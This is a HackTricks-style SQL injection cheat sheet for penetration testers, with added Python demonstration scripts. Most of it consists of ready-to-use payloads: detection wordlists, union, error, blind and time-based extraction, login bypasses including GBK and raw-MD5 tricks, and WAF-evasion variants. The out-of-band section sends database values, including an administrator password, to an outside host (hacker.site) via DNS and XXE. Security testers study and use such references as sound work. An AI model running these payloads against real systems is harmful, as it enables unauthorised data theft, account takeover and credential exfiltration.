SQL Injection

Tip

Learn and practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn and practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn and practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

What is SQL injection?

SQL injection is a security flaw that lets attackers interfere with the queries an application sends to its database. This access can allow an attacker to view, modify, or delete data they should not be able to reach, including other users' records or any data the application itself can access. Such actions may lead to persistent changes to the application's functionality or content, or even to compromise of the server or a denial of service.

Entry point detection

When a site appears vulnerable to SQL injection (SQLi) because of unusual server responses to SQLi-related input, the first step is to understand how to inject data into the query without breaking it. This requires finding a way to break out of the current context. These are some useful examples:

[Nothing]
'
"
`
')
")
`)
'))
"))
`))

Then, you need to know how to fix the query so that it produces no errors. To fix the query you can either inject data so that the original query accepts the new data, or you can inject your data and append a comment symbol at the end so the rest of the original query is ignored.

Note that if you can see error messages, or can tell the difference between when the query works and when it does not, this phase will be much easier.

Comments

MySQL
#comment
-- comment     [Note the space after the double dash]
/*comment*/
/*! MYSQL Special SQL */

PostgreSQL
--comment
/*comment*/

MSSQL
--comment
/*comment*/

Oracle
--comment

SQLite
--comment
/*comment*/

HQL
HQL does not support comments

Confirming with logical operations

A reliable way to confirm a SQL injection vulnerability is to execute a logical operation and check for the expected outcome. For example, a GET parameter such as ?username=Peter returning identical content when changed to ?username=Peter' or '1'='1 indicates a SQL injection vulnerability.

Likewise, arithmetic operations are an effective confirmation technique. For example, if ?id=1 and ?id=2-1 produce the same result, that is a sign of SQL injection (the expression was evaluated by the database, not treated as a literal).

Examples demonstrating confirmation via logical operations:

page.asp?id=1 or 1=1 -- results in true
page.asp?id=1' or 1=1 -- results in true
page.asp?id=1" or 1=1 -- results in true
page.asp?id=1 and 1=2 -- results in false

This word-list was created to try to confirm SQL injections in the proposed way (each line is one payload; the three groups cover the numeric, single-quote, double-quote and backtick contexts, with and without a closing parenthesis):

True SQLi

true
1
1>0
2-1
0+1
1*1
1%2
1 & 1
1&1
1 && 2
1&&2
-1 || 1
-1||1
-1 oR 1=1
1 aND 1=1
(1)oR(1=1)
(1)aND(1=1)
-1/**/oR/**/1=1
1/**/aND/**/1=1
1'
1'>'0
2'-'1
0'+'1
1'*'1
1'%'2
1'&'1'='1
1'&&'2'='1
-1'||'1'='1
-1'oR'1'='1
1'aND'1'='1
1"
1">"0
2"-"1
0"+"1
1"*"1
1"%"2
1"&"1"="1
1"&&"2"="1
-1"||"1"="1
-1"oR"1"="1
1"aND"1"="1
1`
1`>`0
2`-`1
0`+`1
1`*`1
1`%`2
1`&`1`=`1
1`&&`2`=`1
-1`||`1`=`1
-1`oR`1`=`1
1`aND`1`=`1
1')>('0
2')-('1
0')+('1
1')*('1
1')%('2
1')&'1'=('1
1')&&'1'=('1
-1')||'1'=('1
-1')oR'1'=('1
1')aND'1'=('1
1")>("0
2")-("1
0")+("1
1")*("1
1")%("2
1")&"1"=("1
1")&&"1"=("1
-1")||"1"=("1
-1")oR"1"=("1
1")aND"1"=("1
1`)>(`0
2`)-(`1
0`)+(`1
1`)*(`1
1`)%(`2
1`)&`1`=(`1
1`)&&`1`=(`1
-1`)||`1`=(`1
-1`)oR`1`=(`1
1`)aND`1`=(`1

Confirming with timing

In some cases you will not notice any change on the page you are testing. Therefore, a good way to discover blind SQL injections is to make the DB perform an action that affects the time the page needs to load.
To do so, we concatenate into the SQL query an operation that takes a noticeable amount of time to complete:

MySQL (string concat and logical ops)
1' + sleep(10)
1' and sleep(10)
1' && sleep(10)
1' | sleep(10)

PostgreSQL (only supports string concat)
1' || pg_sleep(10)

MSSQL
1' WAITFOR DELAY '0:0:10'

Oracle
1' AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])
1' AND 123=DBMS_PIPE.RECEIVE_MESSAGE('ASD',10)

SQLite
1' AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
1' AND 123=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))

In some cases the sleep functions will not be allowed. Instead of using those functions you can make the query perform heavy operations that take several seconds (for example a cartesian join of large tables). Examples of these techniques are described separately for each technology (where they exist).

Identifying the back-end

The best way to identify the back-end is to try executing functions that only one back-end supports. You can use the sleep functions from the previous section or the expressions below (table from PayloadsAllTheThings); each row is a condition that is only true on, or only parses on, the named DBMS:

["conv('a',16,2)=conv('a',16,2)"                   ,"MYSQL"],
["connection_id()=connection_id()"                 ,"MYSQL"],
["crc32('MySQL')=crc32('MySQL')"                   ,"MYSQL"],
["BINARY_CHECKSUM(123)=BINARY_CHECKSUM(123)"       ,"MSSQL"],
["@@CONNECTIONS>0"                                 ,"MSSQL"],
["@@CONNECTIONS=@@CONNECTIONS"                     ,"MSSQL"],
["@@CPU_BUSY=@@CPU_BUSY"                           ,"MSSQL"],
["USER_ID(1)=USER_ID(1)"                           ,"MSSQL"],
["ROWNUM=ROWNUM"                                   ,"ORACLE"],
["RAWTOHEX('AB')=RAWTOHEX('AB')"                   ,"ORACLE"],
["LNNVL(0=123)"                                    ,"ORACLE"],
["5::int=5"                                        ,"POSTGRESQL"],
["5::integer=5"                                    ,"POSTGRESQL"],
["pg_client_encoding()=pg_client_encoding()"       ,"POSTGRESQL"],
["get_current_ts_config()=get_current_ts_config()" ,"POSTGRESQL"],
["quote_literal(42.5)=quote_literal(42.5)"         ,"POSTGRESQL"],
["current_database()=current_database()"           ,"POSTGRESQL"],
["sqlite_version()=sqlite_version()"               ,"SQLITE"],
["last_insert_rowid()>1"                           ,"SQLITE"],
["last_insert_rowid()=last_insert_rowid()"         ,"SQLITE"],
["val(cvar(1))=1"                                  ,"MSACCESS"],
["IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0"               ,"MSACCESS"],
["cdbl(1)=cdbl(1)"                                 ,"MSACCESS"],
["1337=1337",   "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],
["'i'='i'",     "MSACCESS,SQLITE,POSTGRESQL,ORACLE,MSSQL,MYSQL"],

Also, if you have access to the output of the query, you can make it print the version of the database (e.g. @@version on MySQL/MSSQL, version() on PostgreSQL, sqlite_version() on SQLite).

Tip

In the following sections we discuss different techniques to exploit the different kinds of SQL Injection. We use MySQL as the example.

Identifying with PortSwigger

SQL injection cheat sheet | Web Security Academy

Exploiting Union Based

Detecting number of columns

If you can see the output of the query, this is the best way to exploit it.
First of all, we need to find out the number of columns the original request returns. This is because both sides of a UNION must return the same number of columns.
Two methods are typically used for this purpose:

Order/Group by

To determine the number of columns in a query, increment the number used in the ORDER BY or GROUP BY clause until you get an error (or a false response). Despite the different purposes of GROUP BY and ORDER BY in SQL, both can be used in the same way to find the query's column count.

1' ORDER BY 1--+    #True
1' ORDER BY 2--+    #True
1' ORDER BY 3--+    #True
1' ORDER BY 4--+    #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+    True
1' GROUP BY 1--+    #True
1' GROUP BY 2--+    #True
1' GROUP BY 3--+    #True
1' GROUP BY 4--+    #False - Query is only using 3 columns
#-1' UNION SELECT 1,2,3--+    True

UNION SELECT

Select more and more null values until the query is correct:

1' UNION SELECT null-- - Not working
1' UNION SELECT null,null-- - Not working
1' UNION SELECT null,null,null-- - Worked

You should use null values, because in some DBMSs the types of the columns on both sides of the UNION must match, and null is valid for every type.

Extract database names, table names and column names

In the following examples we retrieve the names of all databases, the table names of one database, and the column names of one table:

#Database names
-1' UniOn Select 1,2,gRoUp_cOncaT(0x7c,schema_name,0x7c) fRoM information_schema.schemata

#Tables of a database
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,table_name,0x7C) fRoM information_schema.tables wHeRe table_schema=[database]

#Column names
-1' UniOn Select 1,2,3,gRoUp_cOncaT(0x7c,column_name,0x7C) fRoM information_schema.columns wHeRe table_name=[table name]

The catalog tables to read differ for every database, but the methodology is always the same.
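As an added, runnable illustration of the two column-counting methods and of the union dump that follows (this is example code written for this page, not HackTricks' own), the Python below drives a deliberately vulnerable query against an in-memory SQLite database. sqlite_master stands in for MySQL's information_schema.tables; the schema, data and function names are constructed for the example, and sqlite3.OperationalError plays the part of the visible SQL error.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed sample schema: the vulnerable query reads 3 columns from `users`;
    # `secrets` is the table an attacker would want to discover.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT, email TEXT);
        INSERT INTO users VALUES (1, 'alice', 'alice@example.test');
        CREATE TABLE secrets (id INTEGER, flag TEXT);
        INSERT INTO secrets VALUES (1, 'FLAG{constructed}');
    """)
    return conn


def vulnerable_search(conn: sqlite3.Connection, name: str) -> list:
    # Deliberately unsafe: `name` is concatenated into the statement.
    sql = f"SELECT id, name, email FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def count_columns_order_by(conn: sqlite3.Connection, max_cols: int = 32) -> int:
    # ORDER BY n fails as soon as n exceeds the number of selected columns;
    # the last n that worked is the column count.
    for n in range(1, max_cols + 1):
        try:
            vulnerable_search(conn, f"x' ORDER BY {n}-- ")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count exceeds max_cols")


def count_columns_union(conn: sqlite3.Connection, max_cols: int = 32) -> int:
    # UNION SELECT NULL,NULL,... only parses when the widths match.
    for n in range(1, max_cols + 1):
        nulls = ",".join(["NULL"] * n)
        try:
            vulnerable_search(conn, f"x' UNION SELECT {nulls}-- ")
            return n
        except sqlite3.OperationalError:
            continue
    raise RuntimeError("column count exceeds max_cols")


def dump_table_names(conn: sqlite3.Connection, ncols: int) -> list:
    # sqlite_master plays the role information_schema.tables plays in MySQL;
    # group_concat collapses every name into the one column we can read back.
    pad = "".join([", NULL"] * (ncols - 1))
    rows = vulnerable_search(
        conn,
        f"x' UNION SELECT group_concat(name, '|'){pad} FROM sqlite_master WHERE type='table'-- ",
    )
    return rows[0][0].split("|")


def demo() -> dict:
    conn = build_db()
    ncols = count_columns_order_by(conn)
    return {
        "order_by": ncols,
        "union": count_columns_union(conn),
        "tables": sorted(dump_table_names(conn, ncols)),
    }


if __name__ == "__main__":
    print(demo())
```

Both counting loops stop at the first change in behaviour, which is exactly what you watch for in a real response: an error page for ORDER BY, or the first UNION width that renders normally. The `-- ` terminator comments out the original closing quote, as described in the Comments section above.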

Exploiting Hidden Union Based

When the output of a query is visible, but a union-based injection seems unachievable, it signifies the presence of a hidden union-based injection. This scenario often leads to a blind injection situation. To transform a blind injection into a union-based one, the execution query on the backend needs to be discerned.

This can be accomplished through the use of blind injection techniques alongside the default tables specific to your target Database Management System (DBMS). For understanding these default tables, consulting the documentation of the target DBMS is advised.

Once the query has been extracted, it’s necessary to tailor your payload to safely close the original query. Subsequently, a union query is appended to your payload, facilitating the exploitation of the newly accessible union-based injection.

For more comprehensive insights, refer to the complete article available at Healing Blind Injections.

Exploiting Error based

If for some reason you cannot see the output of the query but you can see the error messages, you can make those error messages exfiltrate data from the database.
Following a flow similar to the Union Based exploitation you can dump the DB. The MySQL payload below forces a duplicate-key error whose message contains the value you want (here @@VERSION):

(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))

Exploiting Blind SQLi

In this case you cannot see the results of the query or any errors, but you can distinguish when the query returns true or false because the page content differs.
In this case, you can abuse that behaviour to dump the database character by character (the subquery must be parenthesised and limited to one row so it can be compared as a scalar):

?id=1 AND (SELECT SUBSTR(table_name,1,1) FROM information_schema.tables LIMIT 1) = 'A'
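Added example (not from the original page): the character-by-character extraction above automated against a simulated blind page, in Python with sqlite3. Instead of trying every character with = 'A', = 'B', ... it binary-searches the code point with > comparisons, which costs about seven requests per character. The database, page simulation and names are constructed for this example, and SQLite's unicode()/substr() replace MySQL's ORD()/SUBSTR().

```python
import sqlite3

# Scalar subquery for the alphabetically first table name (SQLite's catalog table).
FIRST_TABLE = "(SELECT name FROM sqlite_master WHERE type='table' ORDER BY name LIMIT 1)"


def build_db() -> sqlite3.Connection:
    # Constructed sample database; the attacker knows nothing about `secrets`.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER, name TEXT);
        INSERT INTO users VALUES (1, 'alice');
        CREATE TABLE secrets (id INTEGER, flag TEXT);
    """)
    return conn


class BlindPage:
    """Simulates a page that only reveals whether the unsafe query matched a row."""

    def __init__(self, conn: sqlite3.Connection):
        self.conn = conn
        self.requests = 0

    def shows_item(self, item_id: str) -> bool:
        self.requests += 1
        # Numeric context: no quote to break out of, the injection follows the id directly.
        sql = f"SELECT id FROM users WHERE id = {item_id}"
        return self.conn.execute(sql).fetchone() is not None


def blind_int(page: BlindPage, expr: str, lo: int, hi: int) -> int:
    # Binary search on "expr > mid": about log2(hi - lo) requests per value instead
    # of one request per candidate. A NULL expr compares false and settles at lo.
    while lo < hi:
        mid = (lo + hi) // 2
        if page.shows_item(f"1 AND ({expr}) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    return lo


def extract_first_table_name(page: BlindPage) -> str:
    # Learn the length first so we know when to stop, then each code point.
    length = blind_int(page, f"length({FIRST_TABLE})", 0, 64)
    name = ""
    for pos in range(1, length + 1):
        code = blind_int(page, f"unicode(substr({FIRST_TABLE}, {pos}, 1))", 32, 126)
        name += chr(code)
    return name


def demo() -> dict:
    page = BlindPage(build_db())
    name = extract_first_table_name(page)
    return {"table": name, "requests": page.requests}


if __name__ == "__main__":
    print(demo())
```

On a real target `shows_item` is an HTTP request and the true/false decision is a string match on the response body; everything else stays the same, which is also why rate limiting and WAF rules keyed on `AND (` patterns are worth checking here.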

Exploiting Error Blind SQLi

This is the same situation as before, but instead of distinguishing between a true/false response you can distinguish whether the SQL query raised an error or not (perhaps because the HTTP server returns a 500). So in this case you force an SQL error each time you guess the character correctly; the payload below errors because the subquery returns more than one row:

AND (SELECT IF(1,(SELECT table_name FROM information_schema.tables),'a'))-- -

Exploiting Time Based SQLi

In this case there is no way to distinguish the response of the query from the page content. But you can make the page take longer to load if the guessed character is correct. We already saw this technique used above to confirm a SQLi vuln.

1 and (select sleep(10) from information_schema.tables where SUBSTR(table_name,1,1) = 'A' limit 1)#

Stacked Queries

You can use stacked queries to execute multiple statements in succession. Note that while the subsequent statements are executed, their results are not returned to the application. Hence this technique is mainly useful for blind vulnerabilities, where the second statement can trigger a DNS lookup, a conditional error, or a time delay.

Oracle does not support stacked queries. MySQL, Microsoft SQL Server and PostgreSQL do: QUERY-1-HERE; QUERY-2-HERE (for MySQL this also depends on the client library allowing multiple statements per call, which is not the default in every driver).

Out of band Exploitation

If no other exploitation method worked, you can try to make the database exfiltrate the information to an external host you control. For example, via DNS queries (MySQL on Windows resolves the UNC host name when load_file() is called):

select load_file(concat('\\\\',version(),'.hacker.site\\a.txt'));

Out of band data exfiltration via XXE (Oracle)

a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT password FROM users WHERE username='administrator')||'.hacker.site/"> %remote;]>'),'/l') FROM dual-- -

Automated Exploitation

Check the SQLMap Cheatsheet to exploit a SQLi vulnerability with sqlmap.

Tech specific info

We have already discussed the general ways to exploit a SQL Injection vulnerability. Find more database-technology-dependent tricks in this book:

Or you will find a lot of tricks regarding MySQL, PostgreSQL, Oracle, MSSQL, SQLite and HQL in https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection

Authentication bypass

Lists to try to bypass the login functionality:

Login bypass List

Raw hash authentication Bypass

"SELECT * FROM admin WHERE pass = '".md5($password,true)."'"

This query is vulnerable because md5() is called with true (raw binary output) and the 16 raw bytes are concatenated straight into the statement. Any input whose raw digest happens to contain a quote followed by SQL syntax rewrites the WHERE clause. The classic example is ffifdyop: its raw MD5 starts with the bytes 27 6f 72 27 36 ('or'6), so the query becomes pass = '' or '6…', and MySQL evaluates the string '6…' as the number 6, i.e. true. The sha1 example below works the same way with '=':

md5("ffifdyop", true) = 'or'6�]��!r,��b�
sha1("3fDf ", true) = Q�u'='�@�[�t�- o��_-!
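Added, runnable illustration (not from the original page) reproducing the raw-MD5 bypass in Python against sqlite3, which applies the same "string starting with a digit is truthy" conversion as MySQL. It also shows that the fix is binding the value, not switching hash functions: the very same raw digest is harmless as a bound parameter. The admin table, stored password and function names are constructed for this example.

```python
import hashlib
import sqlite3


def raw_md5(password: str) -> str:
    # Equivalent of PHP md5($password, true): the raw 16-byte digest. PHP strings are
    # byte strings, so each byte is mapped to one latin-1 character to mimic that.
    return hashlib.md5(password.encode()).digest().decode("latin-1")


def build_db() -> sqlite3.Connection:
    # Constructed admin table; the real password is never used by the attacker.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (user TEXT, pass TEXT)")
    conn.execute("INSERT INTO admin VALUES ('admin', ?)", (raw_md5("s3cret-constructed"),))
    return conn


def login_vulnerable(conn: sqlite3.Connection, password: str) -> bool:
    # Mirrors "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
    # With ffifdyop the digest begins with 'or'6, so the clause reads
    #   pass = '' or '6...'   ->   '6...' is cast to the number 6, which is true.
    sql = "SELECT 1 FROM admin WHERE pass = '" + raw_md5(password) + "'"
    return conn.execute(sql).fetchone() is not None


def login_safe(conn: sqlite3.Connection, password: str) -> bool:
    # Same raw digest, but bound as a parameter: quote bytes are data, not syntax.
    row = conn.execute("SELECT 1 FROM admin WHERE pass = ?", (raw_md5(password),)).fetchone()
    return row is not None


def demo() -> dict:
    conn = build_db()
    return {
        "digest_prefix": raw_md5("ffifdyop")[:5],                 # "'or'6"
        "bypass_vulnerable": login_vulnerable(conn, "ffifdyop"),  # True
        "bypass_safe": login_safe(conn, "ffifdyop"),              # False
        "real_password_safe": login_safe(conn, "s3cret-constructed"),  # True
    }


if __name__ == "__main__":
    print(demo())
```

Using md5($password) without true (hex output) only avoids the bypass by accident, because hex digits can never contain a quote; the concatenation itself is still the defect and any other attacker-influenced value in the same query remains exploitable.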

Injected hash authentication Bypass

admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'

Recommended list:

Use each line of the list as the username and, every time, the password Pass1234.
(These payloads are also included in the big list mentioned at the beginning of this section.)

GBK Authentication Bypass

If ' is escaped with a backslash (addslashes or mysql_escape_string) and the connection charset is a multibyte one such as GBK, you can send %A8%27: after escaping it becomes 0xA8 0x5C 0x27, and the database reads 0xA8 0x5C as a single two-byte character (╘), so the 0x27 quote is no longer escaped:

%A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2
%bf' or 1=1 -- --

Python script (rewritten for Python 3; the body is sent pre-encoded so the raw 0xBF byte reaches the server unchanged instead of being re-encoded as UTF-8, and the header name is the real Referer):

import requests

url = "http://example.com/index.php"
cookies = {"PHPSESSID": "4j37giooed20ibi12f3dqjfbkp3"}
# login = 0xBF 0x27 "OR 1=1 #", password = test, percent-encoded by hand so the
# server decodes the single byte 0xBF rather than its UTF-8 form C2 BF.
body = b"login=%BF%27OR+1%3D1+%23&password=test"
headers = {"Referer": url, "Content-Type": "application/x-www-form-urlencoded"}
r = requests.post(url, data=body, cookies=cookies, headers=headers)
print(r.text)
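Added example (not from the original page) showing, in Python, why the multibyte trick works and what a charset-aware escape does differently: a byte-wise addslashes() is applied to the page's payload (0xBF 0x27 OR 1=1 #), and the result is then decoded the way the database would in a GBK connection versus a UTF-8 one. The addslashes and charset_aware_escape functions are simplified stand-ins for PHP's addslashes()/mysql_real_escape_string(), not their real code.

```python
def addslashes(data: bytes) -> bytes:
    # Byte-wise escaping in the style of PHP addslashes()/mysql_escape_string():
    # it has no idea which bytes belong together as one multibyte character.
    out = bytearray()
    for b in data:
        if b == 0x00:
            out += b"\\0"
        elif b in (0x27, 0x22, 0x5C):  # ' " \
            out += b"\\" + bytes([b])
        else:
            out.append(b)
    return bytes(out)


def build_login_query(login: bytes, connection_charset: str) -> str:
    # The app escapes the raw bytes, then the DB decodes the statement text in the
    # connection charset. Under GBK the pair 0xBF 0x5C is ONE character, so the
    # backslash is swallowed and the following 0x27 is a live quote again.
    escaped = addslashes(login)
    decoded = escaped.decode(connection_charset, errors="replace")
    return f"SELECT * FROM users WHERE login='{decoded}' AND password='x'"


def quote_still_escaped(query: str) -> bool:
    return "\\'" in query


def charset_aware_escape(data: bytes, connection_charset: str) -> bytes:
    # What a charset-aware escape (mysqli_real_escape_string after mysqli_set_charset)
    # does: interpret the bytes as characters first. A lone lead byte followed by 0x27
    # is not a valid GBK sequence, so it is rejected instead of passed through.
    try:
        text = data.decode(connection_charset, errors="strict")
    except UnicodeDecodeError as exc:
        raise ValueError("invalid multibyte sequence in input") from exc
    escaped = []
    for ch in text:
        if ch == "\x00":
            escaped.append("\\0")
        elif ch in ("'", '"', "\\"):
            escaped.append("\\" + ch)
        else:
            escaped.append(ch)
    return "".join(escaped).encode(connection_charset)


# The page's %bf' or 1=1 payload as raw bytes (constructed input for the example).
PAYLOAD = b"\xbf\x27 OR 1=1 #"


def demo() -> dict:
    gbk_query = build_login_query(PAYLOAD, "gbk")
    utf8_query = build_login_query(PAYLOAD, "utf-8")
    try:
        charset_aware_escape(PAYLOAD, "gbk")
        rejected = False
    except ValueError:
        rejected = True
    return {
        "gbk_query": gbk_query,
        "gbk_injected": "' OR 1=1 #" in gbk_query and not quote_still_escaped(gbk_query),
        "utf8_injected": not quote_still_escaped(utf8_query),
        "payload_rejected": rejected,
        # A genuine GBK character whose trail byte is 0x5C must survive untouched.
        "legit_gbk_char_untouched": charset_aware_escape(b"\xbf\x5c", "gbk") == b"\xbf\x5c",
    }


if __name__ == "__main__":
    print(demo())
```

Under UTF-8 the 0xBF byte cannot start a sequence, so the backslash stays in front of the quote and nothing is injected; the bug needs both a charset-unaware escape and a connection charset in which 0x5C is a valid trail byte (GBK, Big5, SJIS). Setting the charset through the driver (mysqli_set_charset rather than SET NAMES) is what makes the real escape function behave like charset_aware_escape here.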

Polyglot injection (multicontext)

SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/

Insert Statement

Modify the password of an existing object/user

To do so, try to create a new object with the same name as the "master object" (probably admin in the case of users) while changing something small:

  • Create a user named: AdMIn (mixed upper and lower case)
  • Create a user named: admin=
  • SQL Truncation Attack (when there is some kind of length limit on the username or email) --> create a user with the name: admin [a lot of spaces] a

SQL Truncation Attack

If the database is vulnerable and the maximum number of characters for username is, for example, 30, and you want to impersonate the user admin, try to create a username called "admin [30 spaces] a" with any password.

The application checks whether the submitted username already exists in the database. It does not (the trailing "a" makes it unique), so the database truncates the username to the maximum allowed length (here to "admin [25 spaces]") and then strips the trailing spaces on comparison, so the row collides with the existing user "admin" and its password is overwritten with the new one (an error may be shown, but that does not mean it did not work).

More info: https://blog.lucideus.com/2018/03/sql-truncation-attack-2018-lucideus.html & https://resources.infosecinstitute.com/sql-truncation-attack/#gref

Note: This attack will no longer work as described above in recent MySQL installations. While comparisons still ignore trailing whitespace by default, attempting to insert a string longer than the field length results in an error (strict SQL mode, the default since MySQL 5.7), and the insertion fails. For more information check: https://heinosass.gitbook.io/leet-sheet/web-app-hacking/exploitation/interesting-outdated-attacks/sql-truncation

Insert time based checking

Add as many ','','' as you consider necessary to exit the VALUES statement. If the delay is executed, you have a SQL injection. (The payload below uses the MSSQL WAITFOR DELAY syntax; for MySQL or PostgreSQL substitute the sleep functions listed earlier.)

name=','');WAITFOR%20DELAY%20'0:0:5'--%20-

ON DUPLICATE KEY UPDATE

The ON DUPLICATE KEY UPDATE clause in MySQL specifies what the database should do when an INSERT would produce a duplicate value in a UNIQUE index or PRIMARY KEY. The following example shows how this feature can be abused to change the password of an administrator account:

Example Payload Injection:

An injection payload can be crafted as follows, attempting to insert two rows into the users table. The first row is a decoy; the second targets an existing administrator's email with the aim of updating its password:

INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_hash_of_newpassword"), ("admin_generic@example.com", "bcrypt_hash_of_newpassword") ON DUPLICATE KEY UPDATE password="bcrypt_hash_of_newpassword" -- ";

Here is how it works:

  • The query attempts to insert two rows: one for generic_user@example.com and another for admin_generic@example.com.
  • If the row for admin_generic@example.com already exists (email being a UNIQUE key), the ON DUPLICATE KEY UPDATE clause triggers, instructing MySQL to set the password field of the existing row to "bcrypt_hash_of_newpassword".
  • Consequently, authentication can then be attempted with admin_generic@example.com and the password corresponding to the bcrypt hash ("bcrypt_hash_of_newpassword" stands for the bcrypt hash of the new password and must be replaced with the actual hash of the password you want).

Extract information

Creating 2 accounts at the same time

When trying to create a new user, and username, password and email are required:

SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -

A new user with username=otherUsername, password=otherPassword, email:FLAG will be created
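Added example (not part of the original page): the two-accounts payload above executed against a constructed SQLite schema in Python, next to the parameterised INSERT that makes the same input harmless. Table and column names follow the page; the flag value is made up.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed schema matching the page: users(username, password, email) and a flag table.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (username TEXT, password TEXT, email TEXT);
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('FLAG{constructed}');
    """)
    return conn


def register_vulnerable(conn: sqlite3.Connection, username: str, password: str, email: str) -> None:
    # Deliberately unsafe: the three values are concatenated into the INSERT.
    sql = ("INSERT INTO users (username, password, email) "
           f"VALUES ('{username}','{password}','{email}')")
    conn.execute(sql)


def register_safe(conn: sqlite3.Connection, username: str, password: str, email: str) -> None:
    conn.execute("INSERT INTO users (username, password, email) VALUES (?, ?, ?)",
                 (username, password, email))


# The page's email payload: closes the first row, adds a second row whose email
# column is a scalar subquery, and comments out the original closing quote.
EMAIL_PAYLOAD = "TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -"


def demo() -> dict:
    vuln = build_db()
    register_vulnerable(vuln, "TEST", "TEST", EMAIL_PAYLOAD)
    vuln_rows = vuln.execute("SELECT username, email FROM users ORDER BY username").fetchall()

    safe = build_db()
    register_safe(safe, "TEST", "TEST", EMAIL_PAYLOAD)
    safe_rows = safe.execute("SELECT username, email FROM users").fetchall()

    return {"vulnerable": vuln_rows, "safe": safe_rows}


if __name__ == "__main__":
    print(demo())
```

In the vulnerable run a second account appears whose email field holds the flag, so logging in as otherUsername and opening the profile page reads it back; in the safe run the whole payload is stored verbatim as the email of the single TEST account.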

Using decimal or hexadecimal

With this technique you can extract information while creating only one account. Note that you do not need to comment anything out: the injected expression is a value inside the VALUES list, so the original query stays intact.

Using hex2dec and substr:

'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
__import__('binascii').unhexlify(hex(215573607263)[2:])

Using hex and replace (and substr), mapping characters that would break the context onto safe ones:

'+(select hex(replace(replace(replace(replace(replace(replace(table_name,"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

'+(select hex(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

#Full ascii uppercase and lowercase replace:
'+(select hex(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr(table_name,1,7),"j"," "),"k","!"),"l","\""),"m","#"),"o","$"),"_","%"),"z","&"),"J","'"),"K","`"),"L","("),"M",")"),"N","@"),"O","$$"),"Z","&&")) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'

Routed SQL injection

Routed SQL injection is a situation where the injectable query is not the one that produces output; instead, the result of the injectable query is fed into a second query, and that second query produces the output. (From the paper.) The payload therefore has to be hex-encoded so it survives the first query unchanged and is only interpreted by the second:

Example:

#Hex of: -1' union select login,password from users-- a
-1' union select 0x2d312720756e696f6e2073656c656374206c6f67696e2c70617373776f72642066726f6d2075736572732d2d2061 -- a

WAF Bypass

Initial bypasses from here

No spaces bypass

No Space (%20) - bypass using whitespace alternatives

?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D--
?id=1%0Cand%0C1=1%0C--
?id=1%0Band%0B1=1%0B--
?id=1%0Aand%0A1=1%0A--
?id=1%A0and%A01=1%A0--

No Whitespace - bypass using comments

?id=1/*comment*/and/**/1=1/**/--

No Whitespace - bypass using parentheses

?id=(1)and(1)=(1)--

No commas bypass

No Comma - bypass using OFFSET, FROM and JOIN

LIMIT 0,1         -> LIMIT 1 OFFSET 0
SUBSTR('SQL',1,1) -> SUBSTR('SQL' FROM 1 FOR 1).
SELECT 1,2,3,4    -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d

Generic Bypasses

Blacklist using keywords - bypass using mixed upper/lower case

?id=1 AND 1=1#
?id=1 AnD 1=1#
?id=1 aNd 1=1#

Blacklist using keywords case insensitive - bypass using an equivalent operator

AND   -> && -> %26%26
OR    -> || -> %7C%7C
=     -> LIKE,REGEXP,RLIKE, not < and not >
> X   -> not between 0 and X
WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())Then(table_name)END) -> group_concat(if(table_schema=database(),table_name,null))

Scientific Notation WAF bypass

You can find a more in-depth explanation of this trick in the GoSecure blog.
Basically, you can use scientific notation in unexpected ways for the WAF to bypass it:

-1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1
' or 1.e('')=

